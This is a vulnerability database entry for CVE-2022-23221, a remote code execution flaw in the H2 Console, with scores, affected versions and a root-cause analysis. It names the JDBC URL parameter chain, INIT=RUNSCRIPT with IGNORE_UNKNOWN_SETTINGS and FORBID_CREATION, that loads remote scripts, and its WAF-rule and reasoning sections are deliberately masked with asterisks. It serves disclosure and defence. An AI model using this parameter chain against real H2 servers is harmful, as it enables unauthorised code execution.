Miggo Logo
Miggo Vulnerability Database
CVE-2022-23221

CVE-2022-23221: Arbitrary code execution in H2 Console

9.8

CVSS Score
3.1

Basic Information

CVE ID
CVE-2022-23221
GHSA ID
GHSA-45hx-wfhj-473x
EPSS Score
0.96183%
CWE
CWE-88
Published
1/21/2022
Updated
8/18/2023
KEV Status
No
Technology
TechnologyJava

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
com.h2database:h2maven< 2.1.2102.1.210

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from improper handling of JDBC URL parameters in H2 Console. The WebServer.getConnection() method processes attacker-controlled inputs, enabling dangerous configurations that bypass security restrictions. ConnectionInfo.readSettingsFromURL() parses and applies these parameters, allowing INIT=RUNSCRIPT to execute untrusted scripts. The patch in 2.1.210 specifically addresses these areas (PR #3377), confirming their role in the exploit chain. The CWE-88 classification and PoC using INIT=RUNSCRIPT to load remote SQL scripts further validate this analysis.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

** *onsol* ***or* *.*.*** *llows r*mot* *tt**k*rs to *x**ut* *r*itr*ry *o** vi* * j***:**:m*m J*** URL *ont*inin* t** I*NOR*_UNKNOWN_S*TTIN*S=TRU*;*OR*I*_*R**TION=**LS*;INIT=RUNS*RIPT su*strin*, * *i***r*nt vuln*r**ility t**n *V*-****-*****.

Reasoning

T** vuln*r**ility st*ms *rom improp*r **n*lin* o* J*** URL p*r*m*t*rs in ** *onsol*. T** `W**S*rv*r.**t*onn**tion()` m*t*o* pro**ss*s *tt**k*r-*ontroll** inputs, *n**lin* **n**rous *on*i*ur*tions t**t *yp*ss s**urity r*stri*tions. `*onn**tionIn*o.r**